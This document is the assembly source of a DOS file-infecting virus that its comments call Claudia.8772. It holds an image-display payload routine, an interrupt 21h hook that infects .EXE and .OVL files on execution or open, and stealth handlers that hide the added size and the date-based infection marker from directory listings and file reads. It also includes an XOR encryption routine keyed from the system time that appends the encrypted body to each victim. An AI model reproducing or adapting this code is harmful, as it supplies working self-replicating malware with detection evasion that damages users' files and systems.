db 57h,3ch,0d5h,0c4h,0bbh,0e9h,0b3h,80h,0c3h,0b4h,98h,6dh
db 24h,06h,0e7h,0e4h,0d1h,0c7h,0b3h,7ch,9eh,35h,06h,0b2h
db 0c4h,0c5h,0cch,6fh,23h,27h,07h,05h,57h,45h,25h,9fh,58h
db 39h,0d9h,98h,67h,0a8h,6eh,32h,0a0h,94h,76h,0c2h,85h,47h
db 83h,60h,28h,0bdh,79h,15h,0d9h,0a4h,5fh,0a4h,62h,0ch,8bh
db 0a4h,0a1h,81h,46h,0ch,0bch,0d4h,0d4h,4eh,45h,41h,0d9h
db 0b8h,92h,0d6h,0d7h,0c7h,0a1h,95h,56h,4ah,34h,19h,0deh,93h
db 3ah,0a2h,70h,50h,0d5h,74h,45h,0e7h,0abh,7fh,0c2h,95h,87h
db 0e7h,0f3h,0e3h,0e8h,0b7h,90h,08h,15h,12h,90h,54h,0ah,0b1h
db 96h,6eh,0b0h,0a8h,99h,0a2h,86h,52h,0d9h,0f3h,0eah,0d7h
db 0d4h,0aah,6bh,10h,05h,6fh,34h,09h,0d1h,63h,29h,0b6h,63h
db 13h,0a7h,79h,37h,28h,24h,0ch,0c2h,0b4h,0aeh,0f5h,0c3h,9bh
db 0c1h,95h,4bh,0cch,0e2h,0dfh,0bah,7bh,40h,0d8h,0a8h,91h
db 0a9h,78h,1eh,0e5h,0d8h,0bfh,0c5h,0a4h,78h,29h,16h,09h
db 0d0h,88h,48h,90h,46h,0ah,0cfh,85h,2dh,0d5h,8dh,5fh,0a0h
db 57h,20h,0b7h,70h,2ah,0c3h,9ch,6bh,72h,55h,30h,0bdh,79h
db 30h,6dh,64h,54h,82h,62h,40h,2ah,36h,36h,0c2h,0c5h,0c1h
db 0b1h,0b7h,0a3h,0d1h,95h,4dh,0a2h,63h,24h,0e6h,9bh,63h
db 0b0h,8ah,69h,0e5h,0e6h,0e2h,70h,45h,16h,0dah,0a6h,76h
db 0c9h,0d7h,0cdh,0b1h,88h,4fh,48h,18h,07h,9fh,46h,08h,0c5h
db 7dh,3fh,87h,93h,82h,58h,28h,0ch,0dah,0c4h,0a0h,83h,7ah
db 5ch,0d8h,9ch,7fh,0cah,0c5h,98h,0f4h,0a9h,70h,0ddh,8ch,4bh
db 0f5h,0bbh,91h,0dbh,0e9h,0e2h,91h,39h,07h,90h,57h,23h,40h
db 54h,4fh,54h,54h,54h,6eh,74h,6fh,83h,2bh,06h,6fh,54h,3eh
db 0b4h,0b0h,82h,3eh,43h,46h,88h,86h,76h,1ch,37h,39h,74h,4eh
db 41h,83h,6ch,3fh,5ch,70h,6ch,0d7h,0b4h,66h,96h,0b0h,0a9h
db 0a3h,7bh,52h,46h,3bh,36h,0dah,0e4h,0d2h,0f0h,0cch,0b8h
db 97h,94h,93h,0b2h,93h,56h,86h,94h,97h,0cdh,7ah,17h,0cah
db 0d1h,0adh,9ch,0a2h,74h,7eh,7ch,76h,0ech,98h,50h,3ah,25h
db 0dh,0b9h,64h,31h,9fh,65h,37h,0d6h,7dh,46h,6eh,3ah,2ah
db 0adh,0b4h,0b6h,41h,5bh,67h,95h,2dh,06h,0f5h,0f6h,0f2h,3ah
db 35h,29h,0f5h,9dh,66h,92h,76h,39h,6ah,1bh,06h,0b1h,9bh,8ah
db 87h,89h,8bh,17h,04h,05h,0b6h,57h,29h,96h,8ch,88h,0f4h
db 0b4h,81h,0f5h,0adh,7eh,18h,17h,13h,68h,6ch,6ah,6dh,49h
db 2bh,91h,6fh,54h,92h,60h,1ch,0adh,47h,08h,8eh,21h,0ah,0cdh
db 93h,30h,8fh,57h,37h,59h,37h,1ah,38h,17h,07h,59h,18h,06h
db 0c4h,8dh,77h,0aah,0aeh,0b2h,5ah,65h,63h,91h,63h,39h,0a2h
db 7ah,70h,1ah,27h,27h,37h,08h,04h,0d7h,0dch,0d6h,0e0h,95h
db 50h,0e5h,0d5h,0a9h,28h,2ah,2bh,0c8h,0ddh,0ddh,37h,2ah,28h
db 57h,0bh,05h,0ddh,7dh,62h,0c5h,70h,40h,97h,0a5h,0a5h,90h
db 78h,56h,92h,6ch,39h,56h,3ch,32h,0b2h,0a5h,84h,91h,79h,6ch
db 0bch,0ceh,0ach,0cah,0abh,5ch,0c3h,0ach,97h,0b3h,8bh,38h
db 0d7h,0cch,0bdh,0e8h,0ebh,0d1h,0b4h,0cah,0cbh,0a4h,9ch,79h
db 0f1h,0cbh,0a0h,0cah,0ech,0e3h,0c3h,0cch,0c6h,6dh,7ah,7bh
db 6ah,5dh,50h,40h,4bh,4ah,0cdh,7ch,2fh,82h,52h,24h,46h,2ah
db 1fh,0d6h,0bah,0a9h,0e8h,0f3h,0eeh,0e5h,0dch,0d3h,0e5h,9dh
db 75h,0b1h,8ch,84h,0d9h,0b5h,7fh,38h,3bh,3bh,80h,48h,27h
db 0c8h,0c6h,0afh,79h,8ch,88h,28h,4ch,50h,0dah,0cbh,8ch,0deh
db 8ch,3ah,0a2h,8ch,6dh,0c5h,0bch,9dh,6fh,2ch,08h,0c8h,0bbh
db 80h,9fh,3ch,07h,51h,4ch,4ah,0c6h,9ch,8ah,6fh,3ch,0fh,0c4h
db 0bch,0b0h,0c7h,0ach,7ch,68h,6ch,5ch,0e4h,0eah,0e4h,0dah
db 0cbh,0a1h,54h,5ch,5bh,98h,9dh,9eh,8bh,9ch,9eh,0adh,0bdh
db 0bfh,0bh,01h,50h,0ch,0ah
payload_ proc near ; Payload
mov ax,13h ; Set video mode (graphic video RAM)
int 10h
mov bx,0a000h ; BX = segment of graphic video RAM
mov es,bx ; ES = " " " " "
xor di,di ; Zero DI
mov cs:[bp+counter],di ; Zero counter
mov di,9600h ; DI = offset within graphic video...
lod_nxt_byte:
call lod_img_byte
and ax,0000000011000000b
cmp ax,0000000011000000b
jne sto_img_byte ; Not equal? Jump to sto_img_byte
mov al,cs:[bp+image_byte]
and ax,0000000000111111b
push ax ; Save AX at stack
call lod_img_byte
pop cx ; Load CX from stack (AX)
rep stosb ; Store number of bytes within image
jmp exam_counter
sto_img_byte:
mov al,cs:[bp+image_byte]
stosb ; Store byte within image
exam_counter:
cmp di,0fA01h ; End of video graphic RAM?
jb lod_nxt_byte ; Below? Jump to lod_nxt_byte
mov cx,300h ; Store seven hundred and sixty-ei...
push di ; Save DI at stack
store_loop:
push cx ; Save CX at stack
call lod_img_byte
stosb ; Store byte within image
pop cx ; Load CX from stack
loop store_loop
pop di ; Load DI from stack
push ds ; Save DS at stack
push es ; Save ES at stack
pop ds ; Load DS from stack (ES)
mov dx,di ; DX = offset within graphic video...
mov si,di ; SI = offset within graphic video...
mov cx,300h ; Modify seven hundred and sixty-e...
modify_loop:
lodsb ; AL = byte within graphic video RAM
shr al,01h ; Shift logical right byte within ...
shr al,01h ; " " " " " "
stosb ; Store byte within graphic video RAM
loop modify_loop
pop ds ; Load DS from stack
mov ax,1012h ; Set block of dac registers
xor bx,bx ; BX = starting color register
mov cx,100h ; CX = number of registers to set
int 10h
mov ax,0c06h ; Flush buffer and read standard i...
mov dx,0ffh ; Direct console input
int 21h
push cs ; Save CS at stack
pop ds ; Load DS from stack (CS)
segcs ; Code segment as source segment
lea dx,[bp+message] ; DX = offset of message
call write_string
no_character:
mov ax,600h ; Direct console input
mov dx,0FFh ; " " "
int 21h
jz no_character ; No character available? Jump to ...
mov ax,0c06h ; Flush buffer and read standard i...
mov dx,0ffh ; Direct console input
int 21h
mov ax,03h ; Set video mode (text video RAM)
int 10h
ret ; Return!
endp
lod_img_byte proc near ; Load byte within image, increase...
push si ; Save SI at stack
mov si,cs:[bp+counter] ; SI = counter
mov al,cs:[bp+si+image] ; AL = byte within image
mov cs:[bp+image_byte],al
inc cs:[bp+counter] ; Increase counter
pop si ; Load SI from stack
ret ; Return!
endp
write_string proc near ; Write string to standard output
mov ah,09h ; " " " " "
int 21h
ret ; Return!
endp
zero_regs proc near ; Zero registers
mov si,100h ; SI = offset of beginning of code
xor ax,ax ; Zero AX
xor bx,bx ; Zero BX
xor di,di ; Zero DI
xor bp,bp ; Zero BP
ret ; Return!
endp
dos_list_seg dw ? ; Segment of DOS list of lists
virus_seg dw ? ; Segment of virus in top of memory
int01_virus proc near ; Interrupt 01h of Claudia.8772
push bp ; Save BP at stack
mov bp,sp ; BP = stack pointer
push ax ; Save AX at stack
mov ax,[bp+04h] ; AX = code segment
push bp ; Save BP at stack
call delta_offse_
delta_offse_:
pop bp ; Load BP from stack
cmp ax,cs:[bp+(dos_list_seg-delta_offse_)]
pop bp ; Load BP from stack
jbe found_seg ; Below or equal? Jump to found_seg
push ds si ; Save registers at stack
mov ds,ax ; DS = code segment
mov si,[bp+02h] ; SI = instruction pointer
lodsb ; AL = byte of opcode
cmp al,11001111b ; IRET (opcode 0cfh)?
je iret_ ; Equal? Jump to iret_
cmp al,10011101b ; POPF (opcode 9dh)?
je popf_ ; Equal? Jump to popf_
jmp int01_exit
nop
found_seg:
push es si ; Save registers at stack
call delta_offs__
delta_offs__:
pop si ; Load SI from stack
mov si,cs:[si+(virus_seg-delta_offs__)]
mov es,si ; ES = segment of virus in top of ...
mov word ptr es:[int21_addr+02h],ax
mov ax,[bp+02h] ; AX = offset of interrupt 21h
mov word ptr es:[int21_addr],ax
and word ptr [bp+06h],1111111011111111b
pop si es ; Load registers from stack
jmp int01_exit_
nop
iret_:
or word ptr [bp+0ah],0000000100000000b
jmp int01_exit
nop
popf_:
or word ptr [bp+06h],0000000100000000b
int01_exit:
pop si ds ; Load registers from stack
int01_exit_:
pop ax ; Load AX from stack
pop bp ; Load BP from stack
iret ; Interrupt return!
endp
int24_virus proc near ; Interrupt 24h of Claudia.8772
mov al,03h ; Fail system call in progress
iret ; Interrupt return!
endp
int21_simula proc near ; Simulate interrupt 21h
pushf ; Save flags at stack
call cs:[int21_addr]
ret ; Return!
endp
; ÄÄ´ Interrupt 21h handler ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
int21_virus: cmp ax,'CS' ; Is she Claudia Schiffer?
je own_check ; Let's speak with her :P
cmp ax,4b00h ; File execution?
jz file_exec ; Then try to infect
cmp ah,11h ; FCB findfirst service?
jz fcb_stealth ; Time to stealth
cmp ah,12h ; FCB findnext service?
jz fcb_stealth ; Time to stealth
cmp ah,4eh ; Normal findfirst?
jnz more_checks ; Skip it if not
jmp short file_stealth
nop ; Fifth nop (?)
more_checks: cmp ah,4fh ; Normal findnext?
jz file_stealth ; Gimme some stealth
cmp ah,3dh ; Getting file open?
jnz is_it_xtended ; Nah, maybe extended
jmp file_open ; Yes, go for it!
is_it_xtended: cmp ah,6ch ; Extended file open?
jnz check_read ; Just if it is not
jmp file_open ; Also go for it!
check_read: cmp ah,3fh ; Any file being read?
jnz check_chmod ; Nope, just go on
jmp file_read ; Yes, do da stealth
check_chmod: cmp ax,5700h ; NE1 getting attribs?
jnz fcb_open? ; Nah, just seemed so
jmp file_chmod ; Let's hide ourselves
fcb_open?: cmp ah,0fh ; FCB file open service
jnz fcb_get_size? ; Not being used, np
jmp fcb_file_open ; Go and do some work
fcb_get_size?: cmp ah,23h ; FCB get file size?
jne int21_exit ; Nope, no more checks
jmp fcb_get_size ; Yes, hide our size
int21_exit:
db 11101010b ; 0eah, jmp xxxx:xxxx
int21_addr dd ? ; Original int 21h
; ÄÄ´ Residency check ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
own_check: mov bx,'OS' ; Virus author's nick as
jmp int21_exit ; response, we're alive!
; ÄÄ´ File execution ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_exec: call infect_file ; Try to infect the file
jmp int21_exit ; in DS:DX and jump back
; ÄÄ´ FCB stealth ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
fcb_stealth: call int21_simula ; Call original int 21h
test al,al ; Check for errors and
js back_to_int ; jump if there was any
push ax bx es ; Push registers onto the
mov ah,2fh ; stack and get Disk
int 21h ; Transfer Area in ES:BX
cmp byte ptr es:[bx],0ffh ; Extended DTA?
jnz not_extended ; No need to add
add bx,7 ; Make DTAs compatible
not_extended: mov ax,es:[bx+19h] ; Get size into AX and
cmp ah,64h ; check if the file is
jb leave_stealth ; already infected
ror ah,1 ; Yes, set original size
sub ah,64h ; and date back to remain
rol ah,1 ; completely stealth
mov es:[bx+19h],ax
sub word ptr es:[bx+1dh],virus_size
sbb word ptr es:[bx+1fh],0
leave_stealth: pop es bx ax ; Pop registers and return
back_to_int: iret ; to the interrupt call
; ÄÄ´ File stealth ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_stealth: call int21_simula ; Call original int 21h
jnb call_was_ok ; Check for errors and
retf 2 ; leave if there are any
call_was_ok: push ax bx si es ; Push registers and get
mov ah,2fh ; the file DTA in ES:BX
int 21h
mov ax,es:[bx+18h] ; Get file date in AX
cmp ah,64h ; and check if this file
jb nothing_to_do ; is already infected
ror ah,1 ; If it is, restore both
sub ah,64h ; original date and size
rol ah,1 ; to hide our presence
mov es:[bx+18h],ax
sub word ptr es:[bx+1ah],virus_size
sbb word ptr es:[bx+1ch],0
nothing_to_do: pop es si bx ax ; Pop registers, clear
clc ; carry flag and do a
retf 2 ; return far to caller
; ÄÄ´ FCB file open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
fcb_file_open: call process_file ; Process file infection
fcb_get_size: call int21_simula ; Call original int 21h
test al,al ; Check for possible errors
js do_retf_2 ; when having called it
push bx ax ; Push registers onto stack
mov bx,dx ; Now get the file date in
mov ax,[bx+14h] ; AX by means of the FCB
cmp ah,64h ; structure and check for
jb just_leave ; previous file infection
ror ah,1 ; In case it's infected,
sub ah,64h ; restore original date and
ror ah,1 ; size momentaneously :)
mov [bx+14h],ax
sub word ptr [bx+10h],virus_size
sbb word ptr [bx+12h],0
just_leave: pop ax bx ; Pop registers and do a
retf 2 ; return far to caller
; ÄÄ´ Normal file open ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_open: call process_file ; Process file infection
call int21_simula ; Call original int 21h
jb do_retf_2 ; Has there been any error?
cmp ax,5 ; Check for file handle
jb not_valid ; Skip it if not valid
push ax bx di es ; Push registers onto stack
xchg ax,bx ; and get Job File Table
push bx ; in ES:DI, making possible
mov ax,1220h ; the retrieval of the SFT
int 2fh
nop ; Sixth nop (?)
mov bl,es:[di] ; Now go actually for the
mov ax,1216h ; System File Table which
int 2fh ; corresponds to this file
pop bx ; Restore file handle
call check_marker ; Check if it's infected
jb dont_stealth ; Only if it is not :)
cmp word ptr es:[di],1 ; No more than one handle
ja dont_stealth ; referring to this file
sub word ptr es:[di+11h],virus_size
sbb word ptr es:[di+13h],0
dont_stealth: pop es di bx ax ; Pop registers and leave
not_valid: clc ; once we've substracted
do_retf_2: retf 2 ; our size on the fly
; ÄÄ´ File read ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_read: cmp bx,5 ; Check if current file
jnb good_handle ; handle is valid, and
jmp exit_read ; leave if it is not
good_handle: push si di es ; Push used registers
push ax bx cx bx ; onto the stack :P
mov ax,1220h ; Get Job File Table in
int 2fh ; ES:DI (once again)
nop ; Seventh nop (?)
mov bl,es:[di] ; And now get the System
mov ax,1216h ; File Table for the
int 2fh ; current file in ES:DI
pop bx ; Restore file handle
call check_marker ; Check if this file is
jnb roq_me_babe ; already infected and
jmp pop_and_exit ; just leave if it's not
roq_me_babe: cmp word ptr es:[di+17h],0 ; Are too many bytes
jz lets_surf ; being read so as
jmp pop_and_exit ; to care about it?
lets_surf: cmp word ptr es:[di+15h],1ch ; File pointer in
jnb pop_and_exit ; the MZ header?
push word ptr es:[di+15h] ; Push actual pointer
mov ah,3fh ; and perform a read
call int21_simula ; with the original int
pop cx ; Actual pointer in CX
push ax ; Now save bytes read
sub cx,1ch ; Substract the MZ size
neg cx ; Negate operation
cmp ax,cx ; Compare AX and CX
jnb dont_swap ; Do we need to swap?
xchg ax,cx ; Do da boogie-boogie
dont_swap: push ds cx dx ; Push used registers
push word ptr es:[di+15h] ; Save read pointer
push word ptr es:[di+17h] ; Save read pointer
add word ptr es:[di+11h],virus_size
adc word ptr es:[di+13h],0
mov ax,es:[di+11h] ; Now we've restored the
sub ax,1ch ; actual file size, which
mov es:[di+15h],ax ; includes the virus body,
mov ax,es:[di+13h] ; so as to recover the
mov es:[di+17h],ax ; original MZ header
push cs ; Push CS and pop DS to
pop ds ; make them equivalent
mov dx,offset exe_header ; Read the original
mov cx,1ch ; MZ header from the
mov ah,3fh ; virus body, where
call int21_simula ; it is stored
sub word ptr es:[di+11h],virus_size
sbb word ptr es:[di+13h],0
pop word ptr es:[di+17h] ; Set the stealthed size
pop word ptr es:[di+15h] ; and the read pointers
pop dx cx ds ; Pop registers from stack
push ds ; Now do segment push/pop,
pop es ; so we get CS = DS = ES
mov di,dx ; Move the original MZ
mov si,offset exe_header ; header back to the
push cs ; start of the file
pop ds ; which is being read
rep movsb ; (only in memory)
push es ; Play one more time with
pop ds ; the segment shit :P
pop ax cx bx ; Pop registers from the
pop es es di si ; stack, clear carry flag
clc ; and return far to our
retf 2 ; caller, stealth is done
pop_and_exit: pop cx bx ax ; Pop registers and jump
pop es di si ; back straight to the
exit_read: jmp int21_exit ; interrupt 21h exit routine
; ÄÄ´ Get file attributes ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
file_chmod: call int21_simula ; Call original int 21h
jb just_git_out ; Jump in case of error
cmp dh,64h ; Check the file date for
jb back_to_chmod ; our infection mark
ror dh,1 ; Restore original date
sub dh,64h ; if the file is infected,
rol dh,1 ; so we remain stealth
back_to_chmod: iret ; Do an interrupt return
just_git_out: retf 2 ; Do a return far
; ÄÄ´ File processing routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
process_file: push di es cx ax ; Push pertinent registers
cmp ax,6c00h ; Check for extended
open
jnz normal_open ; AX != 6c00h -> AX = 3d00h
xchg dx,si ; Change DS:SI to DS:DX
normal_open: mov di,dx ; Now process filename in
push ds ; order to find a dot and
pop es ; then compare its extension
mov cx,40h ; with our valid wildcards,
mov al,'.' ; so we know whether we can
repne scasb ; infect it or not...
pop ax ; Restore AX and jump if
jcxz jump_back ; no fucking dot was found
cmp word ptr [di],'XE' ; Is it an .EX*?
jnz check_ovl ; No, next check
cmp byte ptr [di+2],'E' ; Is it an .EXE?
jnz jump_back ; Nope, just leave
jmp go_for_it ; Yes, infect it!
nop ; Eighth nop (?)
check_ovl: cmp word ptr [di],'VO' ; Is it an .OV*?
jnz jump_back ; Nah, bad luck
cmp byte ptr [di+2],'L' ; It is an .OVL?
jnz jump_back ; No way, fool
go_for_it: call infect_file ; Lucky strike ;)
jump_back: cmp ah,6ch ; Check if it's necessary
jnz dont_xchg ; to swap DX and SI again,
; in case the call was an
xchg dx,si ; extended open (6c00h),
dont_xchg: pop cx es di ; then return to our caller
ret
; ÄÄ´ File infection routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
infect_file: push ax bx cx dx ; Push registers which are
push si di ds es ; modified in this routine
in al,21h ; Int controller, 8259A
xor al,2 ; Xor the value with 2
out 21h,al ; Int controller, 8259A
xor al,2 ; Xor the value with 2
out 21h,al ; Int controller, 8259A
mov ax,3d00h ; Open file in DS:DX
call int21_simula ; in read-only mode
jnb go_ahead ; Check for possible
jmp quit_this ; errors in opening
nop ; Nineth nop (?)
go_ahead: xor bx,bx ; Set our own int 24h
mov ds,bx
mov word ptr ds:[24h*4],offset int24_virus
mov word ptr ds:[24h*4+2],cs
xchg ax,bx
push bx ; Save file handle
mov ax,1220h ; Now get again file Job
int 2fh ; File Table in ES:DI
nop ; Tenth nop (?)
mov bl,es:[di] ; Go get System File Table
mov ax,1216h ; in ES:DI for our further
int 2fh ; checks of this file
pop bx ; Restore file handle
call check_marker ; Is it already infected?
jnb close_n_pop ; Close it if it is
mov word ptr es:[di+2],2 ; Change open mode
push cs ; to read/write and
pop ds ; make CS == DS
mov dx,offset exe_header ; Read the first 1ch
mov cx,1ch ; bytes of the EXE
mov ah,3fh ; and check for "MZ"
call int21_simula
cmp word ptr ds:[exe_header],'ZM' ; EXE magic?
jz is_it_newexe?
close_n_pop: mov ah,3eh ; Close the file if something
call int21_simula ; something has gone wrong,
quit_this: jmp pop_and_leave ; pop registers and leave
is_it_newexe?: cmp word ptr ds:[exe_header+18h],40h
jnz any_overlay?
jmp pop_and_leave ; Only if it is a NewEXE
any_overlay?: cmp word ptr ds:[exe_header+1ah],0
jz bless_victim
jmp pop_and_leave ; Or if it has overlays
bless_victim: push es di cs ; Our victim is ok to
pop es ; be infected, so we
mov si,offset exe_header ; just go straight to
mov di,offset new_header ; it... first move the
mov cx,1ch ; MZ header to another
rep movsb ; read buffer :)
pop di es ; Restore registers
push word ptr es:[di+11h] ; and save file size,
push word ptr es:[di+13h] ; given by the SFT
push word ptr ds:[exe_header+16h] ; Save original
pop [initial_cs_] ; CS pointer in
add [initial_cs_],10h ; our own code
push word ptr ds:[exe_header+14h] ; Save also the
pop [initial_ip_] ; IP (14h) field
push word ptr ds:[exe_header+0eh] ; Do the same we
pop [initial_ss] ; did with CS with
add [initial_ss],10h ; the stack segment
push word ptr ds:[exe_header+10h] ; And also save
pop [initial_sp] ; the stack pointer
pop dx ax ; Get file size in DX:AX
push ax dx bx ; and save them and BX
mov cl,0ch ; I said, uh, hip-hop, the
shl dx,cl ; hibbe to the hibbe, the
mov bx,ax ; hip-hip-uh-hop, you don't
mov cl,4 ; stop the rockin' to the
shr bx,cl ; bang-bang boogie, say up,
add dx,bx ; jump the boogie to the
and ax,0fh ; rhythm of the boogety beat!
pop bx ; Get handle
sub dx,word ptr ds:[exe_header+8] ; Header size
mov word ptr ds:[exe_header+16h],dx ; in paras and
mov word ptr ds:[exe_header+14h],ax ; new CS:IP
pop dx ax
add ax,virus_size ; Add virus size to AX
nop ; Eleventh nop (?)
adc dx,0 ; And add with carry
push ax dx ; Save AX:DX again
mov cl,4 ; Now let's calculate
shr ax,cl ; the necessary values
add ax,0c8h ; for the SS:SP fields
cmp ax,word ptr ds:[exe_header+0eh]
jb dont_update
; Modify the thing
mov dx,0fffeh
mov word ptr ds:[exe_header+0eh],ax
mov word ptr ds:[exe_header+10h],dx
dont_update: pop dx ax ; Pop file length
mov cx,200h ; Calculate the number of
div cx ; pages and write it
inc ax
mov word ptr ds:[exe_header+2],dx ; Update these
mov word ptr ds:[exe_header+4],ax ; MZ pointers
mov ax,4202h ; Lseek to the end of the
cwd ; file, we're gonna append
xor cx,cx ; the viral code to it at
call int21_simula ; last, it took its time :)
mov ax,word ptr ds:[exe_header+14h]
call encrypt_virus
mov dx,offset new_header ; Now write the fuckin
mov cx,1ch ; MZ header to the end,
mov ah,40h ; guess foe what? :P
call int21_simula
mov word ptr es:[di+15h],0 ; Lseek to the start
mov word ptr es:[di+17h],0 ; by means of the SFT
mov dx,offset exe_header ; Write our cooler MZ
mov ah,40h ; header and replace
call int21_simula ; the original one
mov cx,es:[di+0dh] ; Now just prepare our
mov dx,es:[di+0fh] ; infection mark so as
ror dh,1 ; to easily distinguish
add dh,64h ; later our infectees
rol dh,1 ; when needing to stealth
mov ax,5701h ; or just to not to do
call int21_simula ; any kinda reinfection
mov ah,3eh ; Close file in BX, we
call int21_simula ; have just infected it
pop_and_leave: pop es ds di si ; Restore every register
pop dx cx bx ax ; we had pushed before
ret ; and return to our caller
; ÄÄ´ Virus encryption routine ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
encrypt_virus: push es di bx ax ; Push these onto the stack
mov bx,ax ; Move the new IP to BX
get_day_time: xor ah,ah ; Get time of day in CX:DX
int 1ah ; You might be dumb enough
test dl,dl ; to not to understand this
jz get_day_time ; intends to be random :P
mov [crypt_key],dl ; Store decryption key
pop ax ; Restore new IP in AX
add ax,(crypt_begin-virus_begin) ; Add IP to offset of
mov [crypt_offset],ax ; crypt_begin and of
add ax,(crypt_end-crypt_begin-01h) ; crypt_end and store
mov [crypt_offse_],ax ; both in our code
mov si,offset virus_begin ; First of all, copy
mov di,offset virus_end ; virus decryptor to
push cs ; the start of the
pop es ; encryption buffer,
mov cx,decryptor_size ; which is gonna be
rep movsb ; appended to the file
mov si,offset crypt_begin ; Now point to the
mov cx,virus_size-2dh ; start of the code
pick_n_roll: lodsb ; and encrypt it into
xor al,dl ; our temporal buffer
neg dl ; in order to get the
stosb ; definitive generation
loop pick_n_roll ; ready to be written
pop bx di es ; Restore registers
mov ah,40h ; And now, the magical
mov cx,virus_size-1ch ; moment... attachment ;)
nop ; Twelveth nop (?)
mov dx,offset virus_end ; Write our encrypted
call int21_simula ; code to the end of
ret ; our victim and return
; ÄÄ´ Check infection marker ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
check_marker: mov ax,es:[di+0fh] ; Check if the file date
cmp ah,64h ; is equal to our marker
ret ; and return to caller
; ÄÄ´ Data area ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
initial_cs_ dw ? ; Initial CS relative to start of ...
initial_ip_ dw ? ; Initial IP
initial_ss dw ? ; Initial SS relative to start of ...
initial_sp dw ? ; Initial SP
decryptor_size equ 11h ; Temporal, decryptor size
virus_size equ 2244h ; Temporal, virus size
crypt_end label byte ; End of encrypted code
code_end label byte ; End of viral code
db 04h dup (?)
exe_header db 1ch dup (?) ; Viral modified MZ header
new_header db 1ch dup (?) ; Host original MZ header
virus_end label byte ; Absolute virus end
db (code_end-virus_begin) dup (?)
data_end label byte ; End of virus data
end code_begin
